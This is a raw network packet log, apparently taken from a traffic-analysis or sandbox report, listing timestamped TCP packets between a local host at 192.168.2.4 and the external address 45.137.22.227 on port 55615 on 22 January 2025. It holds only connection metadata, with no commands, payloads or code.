Jan 22, 2025 14:12:11.914148092 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914161921 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914175034 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914189100 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914212942 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914228916 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914233923 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914239883 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914252043 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914278984 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914282084 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914315939 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914318085 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914329052 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914340973 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914345026 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914354086 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914366007 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914382935 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914391041 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914411068 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914422035 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914433956 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914434910 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914448977 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914459944 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914469957 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914494991 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914503098 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914515972 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914519072 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914527893 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914550066 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914561033 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914572954 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914576054 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914593935 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914596081 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914622068 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914628029 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.914634943 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914648056 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914674044 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914690971 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914711952 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914724112 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914743900 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914756060 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914767027 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914778948 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914798975 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914819956 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914840937 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914854050 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914865971 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.914877892 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915338039 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915410995 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915450096 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915463924 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915474892 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915565968 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915579081 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915683031 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915704012 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915725946 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915749073 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915769100 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915781021 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915842056 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915853977 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915883064 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915894985 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915987015 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.915998936 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916049957 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916062117 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916085958 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916096926 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916132927 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916153908 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916176081 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916197062 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916208982 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916219950 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916239977 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916254997 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916284084 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916296005 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916327000 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916337967 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916414976 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916426897 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916497946 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916508913 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916522026 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916532993 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916984081 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.916996002 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917104959 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917117119 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917140007 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917160988 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917186022 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917206049 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917222977 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917234898 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917259932 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917279959 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917301893 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917314053 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917346954 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917357922 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917407036 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917423010 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917459965 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917479992 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917512894 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917525053 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917552948 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917567968 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917588949 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917602062 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917670965 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917737961 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917749882 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917814970 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917838097 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917850018 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917871952 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917884111 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917929888 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.917942047 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918509007 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918598890 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918616056 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918648005 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918661118 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918756008 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918781996 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918797970 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918817997 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918843031 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918878078 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918889999 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918915987 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918927908 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918942928 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918973923 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.918991089 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919027090 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919039965 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919054985 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919076920 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919102907 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919115067 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919137955 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919150114 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919169903 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919182062 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919214010 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919238091 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919259071 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919281960 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919302940 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919325113 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919358969 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919379950 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919409037 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919423103 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919454098 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919467926 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.919531107 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920028925 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920085907 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920098066 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920170069 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920192003 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920264006 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920277119 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920378923 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920392036 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920478106 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920490026 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920526028 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920537949 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920635939 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920655966 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920717001 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920737982 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920815945 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920828104 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920875072 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920886993 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920917988 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920929909 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.920978069 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921008110 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921040058 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921051979 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921123028 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921135902 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921184063 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921195984 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921276093 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921288967 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921506882 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921519041 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921575069 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921587944 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921644926 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921658039 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921952009 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.921963930 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922034025 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922045946 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922091007 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922103882 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922137976 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922151089 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922239065 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922250032 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922264099 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922275066 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922331095 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922343016 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922446012 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922458887 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922529936 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922540903 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922573090 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922590017 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922619104 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922631025 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922696114 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922708988 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922775984 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922787905 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922844887 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922877073 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922934055 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.922946930 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923017025 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923029900 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923233986 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923245907 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923266888 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923278093 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923290014 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923326015 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923357010 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923377991 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923388958 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923399925 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923432112 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923444033 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923469067 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923480988 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923510075 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923522949 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923533916 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923544884 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923557043 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923572063 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923676968 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923688889 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923702002 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923748016 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923759937 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923770905 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923804045 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923826933 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923837900 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923856974 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923868895 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923880100 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923894882 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923913002 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923938990 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923950911 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.923991919 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924005032 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924009085 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924020052 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924025059 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924029112 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924032927 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924037933 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924042940 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924053907 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924086094 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924118042 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924133062 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924144030 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924170017 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924231052 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924242973 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924253941 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924264908 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924290895 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924302101 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924324036 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924345016 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924361944 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924382925 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924395084 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924407005 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924417973 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924428940 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924439907 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924451113 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924462080 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924474001 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924484968 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924506903 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924520016 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.924531937 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.968763113 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:12.973340034 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:12.976087093 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:12.980995893 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:12.981156111 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:12.981959105 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:12.986777067 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.019542933 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.332789898 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.337768078 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.337843895 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.337856054 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.337929010 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.337944031 CET	55615	49740	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:13.338005066 CET	49740	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:13.338022947 CET	55615	49740	45.137.22.227	192.168.2.4
